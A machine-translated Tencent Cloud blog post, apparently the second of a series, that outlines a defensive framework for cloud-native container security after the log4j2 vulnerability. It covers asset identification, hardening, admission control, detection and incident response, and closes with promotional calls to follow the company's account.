Security construction and security operation under cloud native architecture from the perspective of major vulnerability emergency (Part 2)

foreword

In the previous article, we briefly analyzed how to quickly respond and repair major security vulnerabilities under the cloud-native architecture, as well as the challenges and advantages of the cloud-native architecture for this security emergency. After the incident, we need to think about the pain and think systematically, how to carry out effective security construction and security operation in the face of cloud native architecture, so that we can handle security incidents with ease.

Tencent Cloud Container Service TKE currently has the largest Kubernetes cluster in China , running multiple application scenarios including games, payments, live broadcasts, and finance. The stable operation of the cluster is inseparable from the escort of security capabilities. Tencent Cloud Container Security Service TCSS has mastered the industry's most cutting-edge cloud-native security perspective, provided continuous guidance for TKE's security governance, and accumulated rich thinking and best practices.

This article will combine our security construction and security operation practices to systematically share our thoughts on security construction and security operations under the cloud native architecture.

Security Construction and Security Operation under Cloud Native Architecture

Safe operation is the goal, and safe capability is the means . The building of safety capabilities is closely related to safety operations. Safety capability building is the foundation of safety operations, and it is difficult to cook without rice. Better safety capability building can make safety operations smoother, and safety operations can also provide better security capabilities. Good input and feedback make security detection and protection capabilities more accurate.

The construction and operation of security capabilities under the cloud native architecture is actually a big proposition, which will not be fully covered in this article due to space limitations. This article mainly focuses on the typical scenario of log4j2 vulnerability, and analyzes the necessary options for security capability building from the perspective of security operations.

Traditional security capacity building is essential

The first thing to note is that both container security and cloud-native security we are talking about are relatively narrow concepts, which usually only include the detection and protection of unique security risks under the cloud-native architecture. From the perspective of security risks, we have always emphasized that the security risks under the cloud-native architecture are incremental, so the overall security construction must be a defense-in-depth system, not something that can be accomplished by a product alone. .

For example, WAF, firewall, anti-D, etc. at the entrance and exit of north-south traffic, if our cloud native is built on the basis of IaaS, then the isolation and intrusion detection of VPC and even the network classification and domain at the underlay level are all cloud The foundation of native security construction.

In this emergency response to the log4j2 vulnerability, we also found that even in a container environment, by upgrading WAF rules, updating firewall outbound policies, etc., we can achieve a certain degree of vulnerability mitigation and blocking in the first place.

In the "Tencent Cloud Container Security White Paper" released by Tencent Cloud in November 2021, it also proposed a hierarchical container security system framework, a very important part of which is basic security, which includes the original data center. Security and what the cloud security construction covers.

Safety operation drives safety capability building

For systematic security construction and security operations, some technical organizations and standardization organizations have also proposed relevant standard frameworks. These frameworks have important guidance and reference significance for our security construction. Here we use the network proposed by NIST. Take the security framework as an example as a reference for our cloud-native security construction.

picture

Referring to the NIST cybersecurity framework, we also divide cloud-native security construction into five parallel and sequential steps, namely identification, protection, detection, response, and recovery.

Safe identification

(1) Cluster asset identification

Security identification is mainly reflected in asset identification. The assets here include not only Kubernetes resource-level assets such as cluster, node, namespace, pod, service, and container, but also application asset information in dimensions such as image repositories and container images.

Under the cloud-native architecture, in addition to basic asset identification and inventory, it is also necessary to be able to discover the logical relationship between potential resources and services among these assets. In this way, once it is detected that a certain image contains new vulnerabilities, or corresponding intrusion behaviors are detected, it is necessary to quickly conduct automatic correlation and positioning of all assets and personnel, find the scope of influence, and locate the security responsible person, and then quickly deal with it.

(2) Self-built container identification

In addition to the above-mentioned identification capabilities for assets at the standard cluster level, it also requires a certain ability to adapt to relatively complex environments such as R&D systems. For example, in the R&D environment, in addition to the assets at the standard cluster level, there are also self-built assets. For example, users can directly pull up and run containers with commands such as Docker run.

(3) Business risk identification

From the perspective of security operations, security identification is also reflected in business risk identification. We need to clearly classify the security risk levels for clusters and applications. For high-risk applications, higher-level security policies need to be adopted. For example, for core business systems, there must be strict network isolation and access control mechanisms, and for directly exposed services, there must be stricter permission control in the container dimension.

Security

After you have asset and business risk information, you need to rely on basic security protection capabilities to protect against known threats. The security protection here mainly includes two aspects:

(1) System reinforcement

• Configuration detection and repair

System hardening is a common topic, especially configuration inspection and security configuration hardening, but under the cloud-native architecture, this is especially important. From the perspective of the design concept of the container, it shares the kernel with the operating system, which gives the container user more operational space. Therefore, the security of the configuration will greatly affect the security of the entire system.

As can be seen from the main intrusion paths of the container environment above, an important path is to attack the container through the host, such as through the Docker Remote API. Security capabilities therefore need to include comprehensive configuration checks.

Although configuration hardening is an old problem, in a cloud-native environment, it is still relatively complicated to achieve complete security capabilities. This includes not only the hardening of basic platforms and components such as Kubernetes, Docker, and Istio, but also the configuration of application software in images. Reinforcement, this is more complicated to do. We will not expand here.

From the perspective of security operation, we need to be able to strengthen the security of the basic configuration based on the information obtained from the configuration inspection. At the same time, an important point is that the balance between the security configuration and the stable operation of the business needs to ensure that the security is fully realized on the one hand, and on the other hand, it will not affect the availability and stability of the business. This requires flexibly adjusting the configuration strategy in combination with business characteristics and security configuration requirements while configuring hardening. This will be a continuous revision and improvement process.

• Vulnerability detection and remediation

Known vulnerability repair is also an old topic, including host-level vulnerabilities and mirror vulnerabilities. For detected vulnerabilities, it is necessary to determine whether they need to be repaired and the priority of repairs based on information such as the threat level of the vulnerability and the difficulty of exploitation.

• Image security assessment and repair

As the source of cloud-native applications, container images require more dimensions of security assessment in addition to vulnerabilities. For example, at least the following aspects need to be included: detection of sensitive information in images to ensure that sensitive information will not be leaked; detection of malicious files such as viruses and Trojans in images, which are mainly for public images of uncertain sources; compliance detection of image construction , such as the difference between the use of COPY and ADD.

In addition to the detection and repair of the above image risks, it is also necessary to consider the cleanup of zombie images in security operations, which includes both the cleanup of mirror warehouses and the cleanup of cluster nodes, which is important for reducing the attack surface. effect.

At the same time, different images need to support custom detection rules. Different organizations and users or images of different types of services have different security requirements. Therefore, in the security assessment of images, in addition to a set of general detection and evaluation rules In addition, it is also necessary to support user-defined rules, so that different security rules can be flexibly adopted for different images in combination with the business risk identification above.

• Risk Management

In terms of operation management, for the above-mentioned risk information such as configuration and vulnerabilities, a complete set of closed-loop risk management processes is required to ensure that the identification, repair and confirmation of risks are fully realized.

(2) Security protection

In addition to system reinforcement, in the security protection stage, attacks should be prevented through relevant protection capabilities and protection strategies for known possible intrusion risks at different levels.

• Admission Control

As the name implies, admission control is to control and block at different stages according to security requirements in the full life cycle process of cloud native applications, so as to achieve the security goal, which is also a basic requirement of DevSecOps. With its flexible resource management and automated application orchestration, the cloud-native architecture provides sufficient convenience for security control. The value of access control is reflected in the prevention of security risks on the one hand, and on the other hand, once a major zero-day outbreak such as log4j occurs, access control can be used to quickly control the impact and prevent new risks.

From the perspective of the life cycle process, admission control needs to be implemented from two stages of development (dev) and runtime (ops). Access in the R&D stage mainly refers to the detection of security risks such as vulnerabilities and sensitive information in the CI, warehousing and other stages. The access conditions here usually need to cover the various reinforcement content mentioned above.

The admission control at runtime is mainly reflected in the stage when the application is deployed and run. Only containers/pods that meet the security requirements are allowed to be pulled up and run. The admission conditions here usually include detection of resource restrictions, syscall/ The detection of permission restrictions such as capability, etc.

Similarly, from an operational point of view, in addition to the standard default, admission control rules also need to be able to be flexibly adjusted and improved according to the application.

• Runtime interception

The container under the cloud native architecture carries microservice applications, so theoretically it should not have the execution of high-privilege instructions, although we have made a certain degree of prevention in admission control. Here, based on the runtime security capabilities, we also need to implement the interception of high-risk operations in the container, such as high-risk commands, high-risk system calls, etc., to achieve secure defense-in-depth in different dimensions.

• Network isolation

Horizontal scaling is what an attacker does after the first attack is achieved, which can also be referred to as the post-exploitation phase. In the design of cloud-native networks, there is usually no network isolation capability by default. Therefore, it is necessary to set up and implement a complete network isolation mechanism to achieve network isolation between different services.

The network organization form under the cloud native architecture is different from the traditional host or virtual machine-based network. In Kubernetes, the smallest unit of the network is the Pod, and the Pod carries the service container. Therefore, when implementing network isolation, traditional network policies based on IP and ports will no longer be applicable. We need to implement network isolation of different granularities based on resources such as labels and services.

• Protection policy management

In the process of operation, how to set policies such as admission control, operation interception, network isolation, etc. is a headache, because it is difficult for security administrators, operation and maintenance administrators, and even developers to fully explain It is necessary to know how to configure these rules to achieve the relatively safest state.

This is a challenge for secure operations under a cloud-native architecture, and the cloud-native architecture itself provides advantages to address this challenge. As mentioned above, an important feature of cloud-native architecture is immutable infrastructure, which means that we can automatically learn to generate a set of security baselines based on business characteristics and historical operating data through whitelisting, behavioral models, etc. This security baseline will become an important reference for the configuration of various protection strategies.

Security detection

Security is always a game of offense and defense, and the defense is often in a relatively disadvantaged position, and it can even be said that there is no system that cannot be broken.

Under the cloud-native architecture, services are becoming more open and complex, and attackers have more and more diverse means. The defense and interception measures described above are always difficult to deal with all threats. Some advanced targeted attacks or attacks against Log4j2, a 0-day vulnerability attack, can always easily bypass various defense methods, making security threats hard to guard against.

Therefore, after completing all the above defense and interception measures, it is necessary to continuously perform runtime monitoring and security detection on the cloud native system. Based on the characteristics of cloud native architecture, security detection is divided into two dimensions here.

1) Threat detection at the system dimension

It mainly focuses on the behaviors in the container, such as the detection of abnormal processes in the container, the detection of abnormal files, and the detection of abnormal users. Through these fine-grained abnormal detection, attacks such as privilege escalation and mining can be found.

Threat detection in the network dimension. It is mainly aimed at lateral movement in the post-penetration stage. Although we have set strict access control policies in the protection stage, lateral movement attacks within the reachable range of the network will still bring important security threats. Network threat detection is mainly divided into two aspects: on the one hand, from the perspective of network behavior, anomaly detection of network traffic, especially east-west traffic, is implemented based on Flow. Detection of network threats will play an important role (NDR); on the other hand, from the perspective of data packets, it is to analyze the abnormal data packets of the network between containers, and realize the intrusion detection (NIDS) of the container network.

2) Application-dimensional threat detection

It is also oriented to the lateral movement in the post-penetration stage. The micro-service architecture of applications in the cloud-native era makes a large number of API calls in network communication between containers to ensure that all calls between these APIs are secure, which has a great impact on the security of cloud-native applications. Significance. For example, in the compromised container, the data of other services is obtained through API, or the attack on related services is realized by constructing malicious parameters. Therefore, it is necessary to detect API call anomalies in the application dimension, such as calling behavior, calling path, calling parameters, etc.

Security Response

The security response mainly refers to the disposition measures made in response to the security detection alarm of the previous step. In the security response under the cloud native architecture, especially the security response at the network security level, we prefer to use the operation steps such as bypass detectionresponse processing, rather than the direct connection of IPS and WAF in traditional network security. Blocking detection response, this design is mainly from the perspective of business performance.

Threat response mainly includes two aspects:

(1) Disposal

Through network isolation, suspending containers, stopping abnormal processes, and destroying containers, it can respond to alarms. There is a premise here that in the process of building security capabilities, in view of the short life cycle characteristics of containers, it is necessary to implement complete logs and tracking records in order to achieve traceability and forensics after disposal.

In the process of disposal, for some deterministic anomalies, one-key blocking, one-key isolation, etc. can be used to automate disposal operations to reduce operating costs.

(2) Traceability

According to the alarm, log, tracking and other data of the container and the correlation analysis between the data, it can realize the traceability analysis of the alarm, clarify the attack link, and determine the intrusion cause.

security fixes

The security repair phase mainly includes two aspects: on the one hand, it is to strengthen and repair the relevant risks according to the cause of the intrusion; feedback.

Summarize

It has been more than a month since the Log4j2 vulnerability has passed. I believe that many patches that should be applied have been fixed. Does this sudden emergency make us need to rethink the security construction and security operation under the cloud native architecture? Vulnerabilities or intrusions are difficult to predict, and we don't know when the next one will happen, so we need to think about it and see if we can deal with it calmly.

I hope the thinking in this article can bring some ideas and help to cloud native security construction. If you have any suggestions or questions, please leave a message at the end of the article.

about Us

Immediately follow the official account of [Tencent Cloud Native], reply to "Tencent and Tiger", and receive Tencent's custom red envelope cover~

Welfare:

① Reply to the [Manual] in the background of the official account, you can get the "Tencent Cloud Native Roadmap Manual" & "Tencent Cloud Native Best Practices"~

②The official account will reply to the [series] in the background, and you can get "15 series of 100+ super practical cloud native original dry goods collection", including Kubernetes cost reduction and efficiency enhancement, K8s performance optimization practices, best practices and other series.

③If you reply to the [White Paper] in the background of the official account, you can get the "Tencent Cloud Container Security White Paper" & "The Source of Cost Reduction - Cloud Native Cost Management White Paper v1.0"

③ Reply to [Introduction to the Speed ​​of Light] in the background of the official account, you can get a 50,000-word essence tutorial of Tencent Cloud experts, Prometheus and Grafana of the speed of light.

[Tencent Cloud Native] New products of Yunshuo, new techniques of Yunyan, new activities of Yunyou, and information of cloud appreciation, scan the code to follow the public account of the same name, and get more dry goods in time! !

{{o.name}}
{{m.name}}

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=324080206&siteId=291194637